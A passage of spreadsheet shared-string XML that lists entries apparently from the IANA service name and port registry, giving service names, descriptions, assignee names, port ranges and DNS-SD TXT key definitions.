  </si>
  <si>
    <t>dai-shell</t>
  </si>
  <si>
    <t>Server for the DAI family of client-server products</t>
  </si>
  <si>
    <t>[Data_Access_Inc]</t>
  </si>
  <si>
    <t>[Adam_Robinson]</t>
  </si>
  <si>
    <t>qdb2service</t>
  </si>
  <si>
    <t>Qpuncture Data Access Service</t>
  </si>
  <si>
    <t>[Michael_Yun]</t>
  </si>
  <si>
    <t>45826-45965</t>
  </si>
  <si>
    <t>ssr-servermgr</t>
  </si>
  <si>
    <t>SSRServerMgr</t>
  </si>
  <si>
    <t>[Jeremy_Gilliat]</t>
  </si>
  <si>
    <t>45967-46335</t>
  </si>
  <si>
    <t>inedo</t>
  </si>
  <si>
    <t>Listen port used for Inedo agent communication</t>
  </si>
  <si>
    <t>[Inedo]</t>
  </si>
  <si>
    <t>[Steve_Dennis]</t>
  </si>
  <si>
    <t>46337-46997</t>
  </si>
  <si>
    <t>spremotetablet</t>
  </si>
  <si>
    <t>Connection between a desktop computer or server and a signature tablet to capture handwritten signatures</t>
  </si>
  <si>
    <t>[SOFTPRO_GmbH]</t>
  </si>
  <si>
    <t>[Christoph_Hipp]</t>
  </si>
  <si>
    <t>mediabox</t>
  </si>
  <si>
    <t>MediaBox Server</t>
  </si>
  <si>
    <t>[Alexander_Graef]</t>
  </si>
  <si>
    <t>mbus</t>
  </si>
  <si>
    <t>Message Bus</t>
  </si>
  <si>
    <t>[Dirk_Kutscher]</t>
  </si>
  <si>
    <t>winrm</t>
  </si>
  <si>
    <t>Windows Remote Management Service</t>
  </si>
  <si>
    <t>[Ryan_Mack]</t>
  </si>
  <si>
    <t>47002-47099</t>
  </si>
  <si>
    <t>jvl-mactalk</t>
  </si>
  <si>
    <t>Configuration of motors connected to Industrial Ethernet</t>
  </si>
  <si>
    <t>[JVL_Industri_Elektronik]</t>
  </si>
  <si>
    <t>[Kim_Berthelsen]</t>
  </si>
  <si>
    <t>47101-47556</t>
  </si>
  <si>
    <t>dbbrowse</t>
  </si>
  <si>
    <t>Databeam Corporation</t>
  </si>
  <si>
    <t>[Cindy_Martin]</t>
  </si>
  <si>
    <t>47558-47623</t>
  </si>
  <si>
    <t>directplaysrvr</t>
  </si>
  <si>
    <t>Direct Play Server</t>
  </si>
  <si>
    <t>47625-47805</t>
  </si>
  <si>
    <t>ap</t>
  </si>
  <si>
    <t>ALC Protocol</t>
  </si>
  <si>
    <t>[Dave_Robin]</t>
  </si>
  <si>
    <t>bacnet</t>
  </si>
  <si>
    <t>Building Automation and Control Networks</t>
  </si>
  <si>
    <t>[Coleman_Brumley]</t>
  </si>
  <si>
    <t>presonus-ucnet</t>
  </si>
  <si>
    <t>PreSonus Universal Control Network Protocol</t>
  </si>
  <si>
    <t>[PreSonus_Audio_Electronics_Inc]</t>
  </si>
  <si>
    <t>[Matthias_Juwan]</t>
  </si>
  <si>
    <t>47810-47999</t>
  </si>
  <si>
    <t>nimcontroller</t>
  </si>
  <si>
    <t>Nimbus Controller</t>
  </si>
  <si>
    <t>[Carstein_Seeberg_2]</t>
  </si>
  <si>
    <t>nimspooler</t>
  </si>
  <si>
    <t>Nimbus Spooler</t>
  </si>
  <si>
    <t>nimhub</t>
  </si>
  <si>
    <t>Nimbus Hub</t>
  </si>
  <si>
    <t>nimgtw</t>
  </si>
  <si>
    <t>Nimbus Gateway</t>
  </si>
  <si>
    <t>nimbusdb</t>
  </si>
  <si>
    <t>NimbusDB Connector</t>
  </si>
  <si>
    <t>[Stephen_Harrison]</t>
  </si>
  <si>
    <t>nimbusdbctrl</t>
  </si>
  <si>
    <t>NimbusDB Control</t>
  </si>
  <si>
    <t>48006-48047</t>
  </si>
  <si>
    <t>juka</t>
  </si>
  <si>
    <t>Juliar Programming Language Protocol</t>
  </si>
  <si>
    <t>[Juliar]</t>
  </si>
  <si>
    <t>[Andrei_Mak]</t>
  </si>
  <si>
    <t>3gpp-cbsp</t>
  </si>
  <si>
    <t>3GPP Cell Broadcast Service Protocol</t>
  </si>
  <si>
    <t>[Gert_Thomasen]</t>
  </si>
  <si>
    <t>weandsf</t>
  </si>
  <si>
    <t>WeFi Access Network Discovery and Selection Function</t>
  </si>
  <si>
    <t>[WeFi_Inc]</t>
  </si>
  <si>
    <t>[Eran_Naveh]</t>
  </si>
  <si>
    <t>48051-48127</t>
  </si>
  <si>
    <t>isnetserv</t>
  </si>
  <si>
    <t>Image Systems Network Services</t>
  </si>
  <si>
    <t>[Bengt_Gustafsson]</t>
  </si>
  <si>
    <t>blp5</t>
  </si>
  <si>
    <t>Bloomberg locator</t>
  </si>
  <si>
    <t>48130-48555</t>
  </si>
  <si>
    <t>com-bardac-dw</t>
  </si>
  <si>
    <t>[Nicholas_J_Howes]</t>
  </si>
  <si>
    <t>48557-48618</t>
  </si>
  <si>
    <t>iqobject</t>
  </si>
  <si>
    <t>[Bjorn_de_Bonnenfant]</t>
  </si>
  <si>
    <t>48620-48652</t>
  </si>
  <si>
    <t>robotraconteur</t>
  </si>
  <si>
    <t>Robot Raconteur transport</t>
  </si>
  <si>
    <t>[Wason_Technology_LLC]</t>
  </si>
  <si>
    <t>[John_Wason]</t>
  </si>
  <si>
    <t>48654-48999</t>
  </si>
  <si>
    <t>matahari</t>
  </si>
  <si>
    <t>Matahari Broker</t>
  </si>
  <si>
    <t>[Matahari_Project]</t>
  </si>
  <si>
    <t>[Zane_Bitter]</t>
  </si>
  <si>
    <t>nusrp</t>
  </si>
  <si>
    <t>Nuance Unity Service Request Protocol</t>
  </si>
  <si>
    <t>[Nuance_Communications_Inc3]</t>
  </si>
  <si>
    <t>nusdp-disc</t>
  </si>
  <si>
    <t>Nuance Unity Service Discovery Protocol</t>
  </si>
  <si>
    <t>49002-49149</t>
  </si>
  <si>
    <t>inspider</t>
  </si>
  <si>
    <t>InSpider System</t>
  </si>
  <si>
    <t>[AnRobot]</t>
  </si>
  <si>
    <t>[Zhang_Xinnan]</t>
  </si>
  <si>
    <t>IANA Reserved</t>
  </si>
  <si>
    <t>argus</t>
  </si>
  <si>
    <t>ARGUS Protocol</t>
  </si>
  <si>
    <t>arp</t>
  </si>
  <si>
    <t>Address Resolution Protocol</t>
  </si>
  <si>
    <t>bbn-rcc-mon</t>
  </si>
  <si>
    <t>BBN RCC Monitoring</t>
  </si>
  <si>
    <t>bootp</t>
  </si>
  <si>
    <t>Bootstrap Protocol</t>
  </si>
  <si>
    <t>br-sat-mon</t>
  </si>
  <si>
    <t>Backroom SATNET Monitoring</t>
  </si>
  <si>
    <t>cftp</t>
  </si>
  <si>
    <t>CFTP</t>
  </si>
  <si>
    <t>chaos</t>
  </si>
  <si>
    <t>CHAOS Protocol</t>
  </si>
  <si>
    <t>clock</t>
  </si>
  <si>
    <t>DCNET Time Server Protocol</t>
  </si>
  <si>
    <t>cmot</t>
  </si>
  <si>
    <t>Common Mgmnt Info Ser and Prot over TCP/IP</t>
  </si>
  <si>
    <t>cookie-jar</t>
  </si>
  <si>
    <t>Authentication Scheme</t>
  </si>
  <si>
    <t>dcn-meas</t>
  </si>
  <si>
    <t>DCN Measurement Subsystems Protocol</t>
  </si>
  <si>
    <t>dgp</t>
  </si>
  <si>
    <t>Dissimilar Gateway Protocol</t>
  </si>
  <si>
    <t>dmf-mail</t>
  </si>
  <si>
    <t>Digest Message Format for Mail</t>
  </si>
  <si>
    <t>egp</t>
  </si>
  <si>
    <t>Exterior Gateway Protocol</t>
  </si>
  <si>
    <t>ehf-mail</t>
  </si>
  <si>
    <t>Encoding Header Field for Mail</t>
  </si>
  <si>
    <t>emcon</t>
  </si>
  <si>
    <t>Emission Control Protocol</t>
  </si>
  <si>
    <t>fconfig</t>
  </si>
  <si>
    <t>ggp</t>
  </si>
  <si>
    <t>Gateway Gateway Protocol</t>
  </si>
  <si>
    <t>hmp</t>
  </si>
  <si>
    <t>Host Monitoring Protocol</t>
  </si>
  <si>
    <t>host2-ns</t>
  </si>
  <si>
    <t>Host2 Name Server</t>
  </si>
  <si>
    <t>icmp</t>
  </si>
  <si>
    <t>Internet Control Message Protocol</t>
  </si>
  <si>
    <t>igmp</t>
  </si>
  <si>
    <t>Internet Group Management Protocol</t>
  </si>
  <si>
    <t>igp</t>
  </si>
  <si>
    <t>Interior Gateway Protocol</t>
  </si>
  <si>
    <t>imap2</t>
  </si>
  <si>
    <t>Interim Mail Access Protocol version 2</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>Internet Protocol</t>
  </si>
  <si>
    <t>ipcu</t>
  </si>
  <si>
    <t>Internet Packet Core Utility</t>
  </si>
  <si>
    <t>ippc</t>
  </si>
  <si>
    <t>Internet Pluribus Packet Core</t>
  </si>
  <si>
    <t>ip-arc</t>
  </si>
  <si>
    <t>Internet Protocol on ARCNET</t>
  </si>
  <si>
    <t>ip-arpa</t>
  </si>
  <si>
    <t>Internet Protocol on ARPANET</t>
  </si>
  <si>
    <t>ip-cmprs</t>
  </si>
  <si>
    <t>Compressing TCP/IP Headers</t>
  </si>
  <si>
    <t>ip-dc</t>
  </si>
  <si>
    <t>Internet Protocol on DC Networks</t>
  </si>
  <si>
    <t>ip-dvmrp</t>
  </si>
  <si>
    <t>Distance Vector Multicast Routing Protocol</t>
  </si>
  <si>
    <t>ip-e</t>
  </si>
  <si>
    <t>Internet Protocol on Ethernet Networks</t>
  </si>
  <si>
    <t>ip-ee</t>
  </si>
  <si>
    <t>Internet Protocol on Exp. Ethernet Nets</t>
  </si>
  <si>
    <t>ip-fddi</t>
  </si>
  <si>
    <t>Transmission of IP over FDDI</t>
  </si>
  <si>
    <t>ip-hc</t>
  </si>
  <si>
    <t>Internet Protocol on Hyperchannnel</t>
  </si>
  <si>
    <t>ip-ieee</t>
  </si>
  <si>
    <t>Internet Protocol on IEEE 802</t>
  </si>
  <si>
    <t>ip-ipx</t>
  </si>
  <si>
    <t>Transmission of 802.2 over IPX Networks</t>
  </si>
  <si>
    <t>ip-mtu</t>
  </si>
  <si>
    <t>IP MTU Discovery Options</t>
  </si>
  <si>
    <t>ip-netbios</t>
  </si>
  <si>
    <t>Internet Protocol over NetBIOS Networks</t>
  </si>
  <si>
    <t>ip-slip</t>
  </si>
  <si>
    <t>Transmission of IP over Serial Lines</t>
  </si>
  <si>
    <t>ip-wb</t>
  </si>
  <si>
    <t>Internet Protocol on Wideband Network</t>
  </si>
  <si>
    <t>ip-x25</t>
  </si>
  <si>
    <t>Internet Protocol on X.25 Networks</t>
  </si>
  <si>
    <t>irtp</t>
  </si>
  <si>
    <t>Internet Reliable Transaction Protocol</t>
  </si>
  <si>
    <t>iso-tp4</t>
  </si>
  <si>
    <t>ISO Transport Protocol Class 4</t>
  </si>
  <si>
    <t>larp</t>
  </si>
  <si>
    <t>Locus Address Resoultion Protocol</t>
  </si>
  <si>
    <t>leaf-1</t>
  </si>
  <si>
    <t>Leaf-1 Protocol</t>
  </si>
  <si>
    <t>leaf-2</t>
  </si>
  <si>
    <t>Leaf-2 Protocol</t>
  </si>
  <si>
    <t>loc-srv</t>
  </si>
  <si>
    <t>Location Service</t>
  </si>
  <si>
    <t>mail</t>
  </si>
  <si>
    <t>Format of Electronic Mail Messages</t>
  </si>
  <si>
    <t>merit-inp</t>
  </si>
  <si>
    <t>MERIT Internodal Protocol</t>
  </si>
  <si>
    <t>mib</t>
  </si>
  <si>
    <t>Management Information Base</t>
  </si>
  <si>
    <t>mihcs</t>
  </si>
  <si>
    <t>MIH Command Services</t>
  </si>
  <si>
    <t>[RFC5679]</t>
  </si>
  <si>
    <t>mihes</t>
  </si>
  <si>
    <t>MIH Event Services</t>
  </si>
  <si>
    <t>mihis</t>
  </si>
  <si>
    <t>MIH Information Services</t>
  </si>
  <si>
    <t>mfe-nsp</t>
  </si>
  <si>
    <t>MFE Network Services Protocol</t>
  </si>
  <si>
    <t>mit-subnet</t>
  </si>
  <si>
    <t>MIT Subnet Support</t>
  </si>
  <si>
    <t>mux</t>
  </si>
  <si>
    <t>Multiplexing Protocol</t>
  </si>
  <si>
    <t>netblt</t>
  </si>
  <si>
    <t>Bulk Data Transfer Protocol</t>
  </si>
  <si>
    <t>neted</t>
  </si>
  <si>
    <t>Network Standard Text Editor</t>
  </si>
  <si>
    <t>netrjs</t>
  </si>
  <si>
    <t>nfile</t>
  </si>
  <si>
    <t>A File Access Protocol</t>
  </si>
  <si>
    <t>nvp-ii</t>
  </si>
  <si>
    <t>Network Voice Protocol</t>
  </si>
  <si>
    <t>ospf</t>
  </si>
  <si>
    <t>Open Shortest Path First Interior GW Protocol</t>
  </si>
  <si>
    <t>pcmail</t>
  </si>
  <si>
    <t>Pcmail Transport Protocol</t>
  </si>
  <si>
    <t>ppp</t>
  </si>
  <si>
    <t>Point-to-Point Protocol</t>
  </si>
  <si>
    <t>prm</t>
  </si>
  <si>
    <t>Packet Radio Measurement</t>
  </si>
  <si>
    <t>pup</t>
  </si>
  <si>
    <t>PUP Protocol</t>
  </si>
  <si>
    <t>quote</t>
  </si>
  <si>
    <t>Quote of the Day Protocol</t>
  </si>
  <si>
    <t>rarp</t>
  </si>
  <si>
    <t>A Reverse Address Resolution Protocol</t>
  </si>
  <si>
    <t>ratp</t>
  </si>
  <si>
    <t>Reliable Asynchronous Transfer Protocol</t>
  </si>
  <si>
    <t>rdp</t>
  </si>
  <si>
    <t>Reliable Data Protocol</t>
  </si>
  <si>
    <t>rip</t>
  </si>
  <si>
    <t>Routing Information Protocol</t>
  </si>
  <si>
    <t>rvd</t>
  </si>
  <si>
    <t>Remote Virtual Disk Protocol</t>
  </si>
  <si>
    <t>sat-expak</t>
  </si>
  <si>
    <t>Satnet and Backroom EXPAK</t>
  </si>
  <si>
    <t>sat-mon</t>
  </si>
  <si>
    <t>SATNET Monitoring</t>
  </si>
  <si>
    <t>smi</t>
  </si>
  <si>
    <t>Structure of Management Information</t>
  </si>
  <si>
    <t>stp</t>
  </si>
  <si>
    <t>Stream Protocol</t>
  </si>
  <si>
    <t>sun-rpc</t>
  </si>
  <si>
    <t>Transmission Control Protocol</t>
  </si>
  <si>
    <t>tcp-aco</t>
  </si>
  <si>
    <t>TCP Alternate Checksum Option</t>
  </si>
  <si>
    <t>thinwire</t>
  </si>
  <si>
    <t>Thinwire Protocol</t>
  </si>
  <si>
    <t>tp-tcp</t>
  </si>
  <si>
    <t>ISO Transport Service on top of the TCP</t>
  </si>
  <si>
    <t>trunk-1</t>
  </si>
  <si>
    <t>Trunk-1 Protocol</t>
  </si>
  <si>
    <t>trunk-2</t>
  </si>
  <si>
    <t>Trunk-2 Protocol</t>
  </si>
  <si>
    <t>ucl</t>
  </si>
  <si>
    <t>University College London Protocol</t>
  </si>
  <si>
    <t>User Datagram Protocol</t>
  </si>
  <si>
    <t>users</t>
  </si>
  <si>
    <t>Active Users Protocol</t>
  </si>
  <si>
    <t>via-ftp</t>
  </si>
  <si>
    <t>VIA Systems-File Transfer Protocol</t>
  </si>
  <si>
    <t>visa</t>
  </si>
  <si>
    <t>VISA Protocol</t>
  </si>
  <si>
    <t>vmtp</t>
  </si>
  <si>
    <t>Versatile Message Transaction Protocol</t>
  </si>
  <si>
    <t>wb-expak</t>
  </si>
  <si>
    <t>Wideband EXPAK</t>
  </si>
  <si>
    <t>wb-mon</t>
  </si>
  <si>
    <t>Wideband Monitoring</t>
  </si>
  <si>
    <t>xnet</t>
  </si>
  <si>
    <t>Cross Net Debugger</t>
  </si>
  <si>
    <t>xns-idp</t>
  </si>
  <si>
    <t>Xerox NS IDP</t>
  </si>
  <si>
    <t>1password</t>
  </si>
  <si>
    <t>1Password Password Manager data sharing and synchronization protocol</t>
  </si>
  <si>
    <t>[Roustem_Karimov]</t>
  </si>
  <si>
    <t>a-d-sync</t>
  </si>
  <si>
    <t>Altos Design Synchronization protocol</t>
  </si>
  <si>
    <t>[David_Lasker]</t>
  </si>
  <si>
    <t>abi-instrument</t>
  </si>
  <si>
    <t>Applied Biosystems Universal Instrument Framework</t>
  </si>
  <si>
    <t>[Tor_Slettnes]</t>
  </si>
  <si>
    <t>Defined TXT keys:   product=&lt;short product name/model&gt;
  description=&lt;readable name&gt;
  version=&lt;firmware/instrument controller version&gt;</t>
  </si>
  <si>
    <t>accessdata-f2d</t>
  </si>
  <si>
    <t>FTK2 Database Discovery Service</t>
  </si>
  <si>
    <t>[Rick_Russell]</t>
  </si>
  <si>
    <t>accessdata-f2w</t>
  </si>
  <si>
    <t>FTK2 Backend Processing Agent Service</t>
  </si>
  <si>
    <t>accessone</t>
  </si>
  <si>
    <t>Strix Systems 5S/AccessOne protocol</t>
  </si>
  <si>
    <t>[Scott_Herscher_2]</t>
  </si>
  <si>
    <t>accountedge</t>
  </si>
  <si>
    <t>MYOB AccountEdge</t>
  </si>
  <si>
    <t>acrobatsrv</t>
  </si>
  <si>
    <t>Adobe Acrobat</t>
  </si>
  <si>
    <t>Defined TXT keys: type, path, FeedType</t>
  </si>
  <si>
    <t>acs-ctl-ds</t>
  </si>
  <si>
    <t>Access Control Device</t>
  </si>
  <si>
    <t>[Honwywell_Security_Group]</t>
  </si>
  <si>
    <t>[John_Dziadosz]</t>
  </si>
  <si>
    <t>Defined TXT keys: MAC=, GW-MAC</t>
  </si>
  <si>
    <t>acs-ctl-gw</t>
  </si>
  <si>
    <t>Access Control Gateway</t>
  </si>
  <si>
    <t>actionitems</t>
  </si>
  <si>
    <t>ActionItems</t>
  </si>
  <si>
    <t>[Sailalong_Software]</t>
  </si>
  <si>
    <t>activeraid</t>
  </si>
  <si>
    <t>Active Storage Proprietary Device Management Protocol</t>
  </si>
  <si>
    <t>[Skip_Levens]</t>
  </si>
  <si>
    <t>activeraid-ssl</t>
  </si>
  <si>
    <t>Encrypted transport of Active Storage Proprietary Device Management Protocol</t>
  </si>
  <si>
    <t>addressbook</t>
  </si>
  <si>
    <t>Address-O-Matic</t>
  </si>
  <si>
    <t>[Massimiliano_Ribuoli]</t>
  </si>
  <si>
    <t>addressbooksrv</t>
  </si>
  <si>
    <t>Address Book Server used for contacts and calendar synchronisation</t>
  </si>
  <si>
    <t>[AddressBookServer]</t>
  </si>
  <si>
    <t>[Alexander_Hartner]</t>
  </si>
  <si>
    <t>Defined TXT keys: _suffix, _prefix</t>
  </si>
  <si>
    <t>adnodes</t>
  </si>
  <si>
    <t>difusi Cloud based plug &amp; play network
      synchronization protocol, content pool database discovery, and
      cloudOS SAaS discovery protocol.</t>
  </si>
  <si>
    <t>[DIFUSI_Inc]</t>
  </si>
  <si>
    <t>[Mike_Wright]</t>
  </si>
  <si>
    <t>adobe-shadow</t>
  </si>
  <si>
    <t>Adobe Shadow Server</t>
  </si>
  <si>
    <t>[Adobe_Systems]</t>
  </si>
  <si>
    <t>[Mike_Harris]</t>
  </si>
  <si>
    <t>Defined TXT keys: id</t>
  </si>
  <si>
    <t>adobe-vc</t>
  </si>
  <si>
    <t>Adobe Version Cue</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1, name, version, build</t>
  </si>
  <si>
    <t>adisk</t>
  </si>
  <si>
    <t>Automatic Disk Discovery</t>
  </si>
  <si>
    <t>[Bob_Bradley_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: sys, dkX</t>
  </si>
  <si>
    <t>adpro-setup</t>
  </si>
  <si>
    <t>ADPRO Security Device Setup</t>
  </si>
  <si>
    <t>[Patrick_Noffke]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, type</t>
  </si>
  <si>
    <t>aecoretech</t>
  </si>
  <si>
    <t>Apple Application Engineering Services</t>
  </si>
  <si>
    <t>[Hani_Abdelazim]</t>
  </si>
  <si>
    <t>aeroflex</t>
  </si>
  <si>
    <t>Aeroflex instrumentation and software</t>
  </si>
  <si>
    <t>[David_Hagood]</t>
  </si>
  <si>
    <t>Defined TXT keys:   orb_server=&lt;port #&gt; (optional) CORBA ORB server used for resource discovery
  product_id=&lt;string&gt; (optional) ID of licensed product
  txtvers="*IDN?=&lt;identifier&gt;" (optional) as per LXI specification (for not yet LXI compatible instruments)</t>
  </si>
  <si>
    <t>aerohive-proxy</t>
  </si>
  <si>
    <t>Aerohive Proxy Configuration Service</t>
  </si>
  <si>
    <t>[Aerohive_Networks]</t>
  </si>
  <si>
    <t>[Matthew_Gast]</t>
  </si>
  <si>
    <t>Defined TXT keys: name, port, username</t>
  </si>
  <si>
    <t>airdrop</t>
  </si>
  <si>
    <t>Airdrop</t>
  </si>
  <si>
    <t>[Apple_Inc]</t>
  </si>
  <si>
    <t>[Marc_Krochmal_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: flags, phash, ehash, cname</t>
  </si>
  <si>
    <t>airplay</t>
  </si>
  <si>
    <t>Protocol for streaming of audio/video content</t>
  </si>
  <si>
    <t>[Apple_Inc_2]</t>
  </si>
  <si>
    <t>[Bob_Bradley_3]</t>
  </si>
  <si>
    <t>Defined TXT keys: am, cn, et, ft, fv, md, pk, pw, sf, tp, vn, vs</t>
  </si>
  <si>
    <t>airport</t>
  </si>
  <si>
    <t>AirPort Base Station</t>
  </si>
  <si>
    <t>Defined TXT keys: waMA;</t>
  </si>
  <si>
    <t>airpreview</t>
  </si>
  <si>
    <t>Coda AirPreview</t>
  </si>
  <si>
    <t>[Panic_Inc]</t>
  </si>
  <si>
    <t>[Cabel_Sasser]</t>
  </si>
  <si>
    <t>Defined TXT keys: hasCamera, name, UUID</t>
  </si>
  <si>
    <t>airprojector</t>
  </si>
  <si>
    <t>AirProjector</t>
  </si>
  <si>
    <t>[Yoshinori_Nakayama]</t>
  </si>
  <si>
    <t>Defined TXT keys:   mac=&lt;MAC address&gt;
  ip=&lt;IP address&gt;
  note=&lt;Location&gt;
  use=&lt;Status&gt;
  mainprog=&lt;Main program version&gt;
  bootprog=&lt;Boot program version&gt;</t>
  </si>
  <si>
    <t>airsharing</t>
  </si>
  <si>
    <t>Air Sharing</t>
  </si>
  <si>
    <t>[Erik_Rogers][Dave_Howell]</t>
  </si>
  <si>
    <t>airsharingpro</t>
  </si>
  <si>
    <t>Air Sharing Pro</t>
  </si>
  <si>
    <t>alazartech-atn</t>
  </si>
  <si>
    <t>Alazar Technologies ATN Communication Protocol</t>
  </si>
  <si>
    <t>[Alazar_Technologies]</t>
  </si>
  <si>
    <t>[Romain_Deterre]</t>
  </si>
  <si>
    <t>aloe-gwp</t>
  </si>
  <si>
    <t>Aloe Gateway Protocol</t>
  </si>
  <si>
    <t>[Layered_Logic]</t>
  </si>
  <si>
    <t>[Brooks_Bell]</t>
  </si>
  <si>
    <t>Defined TXT keys: Version</t>
  </si>
  <si>
    <t>aloe-pp</t>
  </si>
  <si>
    <t>Aloe Pairing Protocol</t>
  </si>
  <si>
    <t>Defined TXT keys: Version, DeviceName, DeviceModel, DeviceSystem, DeviceSystemVersion, AppName, AppVersion</t>
  </si>
  <si>
    <t>alpacadiscovery</t>
  </si>
  <si>
    <t>ASCOM Alpaca Device Discovery</t>
  </si>
  <si>
    <t>[ASCOM_Initiative]</t>
  </si>
  <si>
    <t>[Robert_B._Denny]</t>
  </si>
  <si>
    <t>amba-cam</t>
  </si>
  <si>
    <t>Ambarella Cameras</t>
  </si>
  <si>
    <t>[Louis_Sun]</t>
  </si>
  <si>
    <t>Defined TXT keys:   product=&lt;product model name&gt;
  description=&lt;string name&gt;
  version=&lt;firmware version&gt;</t>
  </si>
  <si>
    <t>amiphd-p2p</t>
  </si>
  <si>
    <t>P2PTapWar Sample Application from "iPhone SDK Development" Book</t>
  </si>
  <si>
    <t>[Chris_Adamson]</t>
  </si>
  <si>
    <t>ams-htm</t>
  </si>
  <si>
    <t>Proprietary protocol for Accu-Med HTM</t>
  </si>
  <si>
    <t>[AccuMed_Services]</t>
  </si>
  <si>
    <t>[Sam_Carleton_2]</t>
  </si>
  <si>
    <t>animolmd</t>
  </si>
  <si>
    <t>Animo License Manager</t>
  </si>
  <si>
    <t>[Phil_Barrett]</t>
  </si>
  <si>
    <t>animobserver</t>
  </si>
  <si>
    <t>Animo Batch Server</t>
  </si>
  <si>
    <t>anquetsync</t>
  </si>
  <si>
    <t>Anquet map synchronization between desktop and handheld devices</t>
  </si>
  <si>
    <t>[Paul_Lesurf]</t>
  </si>
  <si>
    <t>antrmai</t>
  </si>
  <si>
    <t>ANT Galio web services</t>
  </si>
  <si>
    <t>[ANT_Software]</t>
  </si>
  <si>
    <t>[Simon_Middleton]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, man</t>
  </si>
  <si>
    <t>anyremote</t>
  </si>
  <si>
    <t>remote control of Linux PCs from Android and J2ME</t>
  </si>
  <si>
    <t>[Mikhail_Fedotov]</t>
  </si>
  <si>
    <t>appelezvous</t>
  </si>
  <si>
    <t>Appelezvous</t>
  </si>
  <si>
    <t>[Marco_Piovanelli]</t>
  </si>
  <si>
    <t>apple-ausend</t>
  </si>
  <si>
    <t>Apple Audio Units</t>
  </si>
  <si>
    <t>[James_McCartney]</t>
  </si>
  <si>
    <t>apple-mobdev</t>
  </si>
  <si>
    <t>Apple Mobile Device Protocol</t>
  </si>
  <si>
    <t>[Apple_2]</t>
  </si>
  <si>
    <t>[Paul_Chinn][Justin_Ko]</t>
  </si>
  <si>
    <t>apple-midi</t>
  </si>
  <si>
    <t>Apple MIDI</t>
  </si>
  <si>
    <t>[Doug_Wyatt]</t>
  </si>
  <si>
    <t>applerdbg</t>
  </si>
  <si>
    <t>Apple Remote Debug Services (OpenGL Profiler)</t>
  </si>
  <si>
    <t>[Dave_Springer]</t>
  </si>
  <si>
    <t>appletv</t>
  </si>
  <si>
    <t>Apple TV</t>
  </si>
  <si>
    <t>[Amandeep_Jawa_3]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, PrVs, OSsi, MniT</t>
  </si>
  <si>
    <t>appletv-itunes</t>
  </si>
  <si>
    <t>Apple TV discovery of iTunes</t>
  </si>
  <si>
    <t>appletv-pair</t>
  </si>
  <si>
    <t>Apple TV Pairing</t>
  </si>
  <si>
    <t>aquamon</t>
  </si>
  <si>
    <t>AquaMon</t>
  </si>
  <si>
    <t>arcnet</t>
  </si>
  <si>
    <t>Arcturus Networks Inc. Hardware Services</t>
  </si>
  <si>
    <t>[Arcturus_Networks_Inc]</t>
  </si>
  <si>
    <t>[Michael_Durrant]</t>
  </si>
  <si>
    <t>arn</t>
  </si>
  <si>
    <t>Active Registry Network for distribution of values and streams</t>
  </si>
  <si>
    <t>[Mictron]</t>
  </si>
  <si>
    <t>[Michael_Wiklund]</t>
  </si>
  <si>
    <t>aroundsound</t>
  </si>
  <si>
    <t>AroundSound's information sharing protocol</t>
  </si>
  <si>
    <t>[Winzig_LLC]</t>
  </si>
  <si>
    <t>[Around_Sound]</t>
  </si>
  <si>
    <t>aseba</t>
  </si>
  <si>
    <t>protocol for an event-based architecture for distributed control of mobile robots</t>
  </si>
  <si>
    <t>[Mobsya_Association]</t>
  </si>
  <si>
    <t>[S_Magnenat]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, type, protovers, ids, pids</t>
  </si>
  <si>
    <t>astnotify</t>
  </si>
  <si>
    <t>Asterisk Caller-ID Notification Service</t>
  </si>
  <si>
    <t>[Sven_Slezak]</t>
  </si>
  <si>
    <t>Defined TXT keys: prefix=&lt;country code prefix&gt; (numeric, additionally '+')</t>
  </si>
  <si>
    <t>astralite</t>
  </si>
  <si>
    <t>Astralite</t>
  </si>
  <si>
    <t>[Tongji_University]</t>
  </si>
  <si>
    <t>async</t>
  </si>
  <si>
    <t>address-o-sync</t>
  </si>
  <si>
    <t>[Markus_Brand]</t>
  </si>
  <si>
    <t>atnet</t>
  </si>
  <si>
    <t>AT protocol over IP</t>
  </si>
  <si>
    <t>[Selectron_BVBA]</t>
  </si>
  <si>
    <t>[Jan_Verschaeve]</t>
  </si>
  <si>
    <t>atlassianapp</t>
  </si>
  <si>
    <t>Atlassian Application (JIRA, Confluence, Fisheye, Crucible, Crowd, Bamboo) discovery service</t>
  </si>
  <si>
    <t>[Denise_Fernandez]</t>
  </si>
  <si>
    <t>Defined TXT keys: app.url</t>
  </si>
  <si>
    <t>attero-ad</t>
  </si>
  <si>
    <t>Attero Tech Audio Device</t>
  </si>
  <si>
    <t>[Attero_Tech_LLC]</t>
  </si>
  <si>
    <t>[David_Vaughn]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers, CtrlType, Model</t>
  </si>
  <si>
    <t>audirvana-ap</t>
  </si>
  <si>
    <t>Audirvana Remote Access Protocol</t>
  </si>
  <si>
    <t>[Audirvana_SCS]</t>
  </si>
  <si>
    <t>[Damien_Plisson]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, protovers</t>
  </si>
  <si>
    <t>autosendimages</t>
  </si>
  <si>
    <t>automatic sending Image data protocol</t>
  </si>
  <si>
    <t>[Canon_Inc_2]</t>
  </si>
  <si>
    <t>[Kazuo_Moritomo]</t>
  </si>
  <si>
    <t>autotargets-ap</t>
  </si>
  <si>
    <t>Access Point for AutoTargets system</t>
  </si>
  <si>
    <t>[Automated_Target_Solutions_Inc.]</t>
  </si>
  <si>
    <t>[Nathan_Walker]</t>
  </si>
  <si>
    <t>Defined TXT keys: none</t>
  </si>
  <si>
    <t>av</t>
  </si>
  <si>
    <t>Allen Vanguard Hardware Service</t>
  </si>
  <si>
    <t>[Mike_Bush]</t>
  </si>
  <si>
    <t>av-chat-ring-01</t>
  </si>
  <si>
    <t>TCP SpyChat Stream Message Exchange</t>
  </si>
  <si>
    <t>[Alexios_Vasileiadis]</t>
  </si>
  <si>
    <t>Defined TXT keys: There are two TXT record keys: 1st key: 
    "txt-vers" associated with an 'int' entry. 2nd key: "conn-stat" 
    associated with an 'int' entry.</t>
  </si>
  <si>
    <t>avatars</t>
  </si>
  <si>
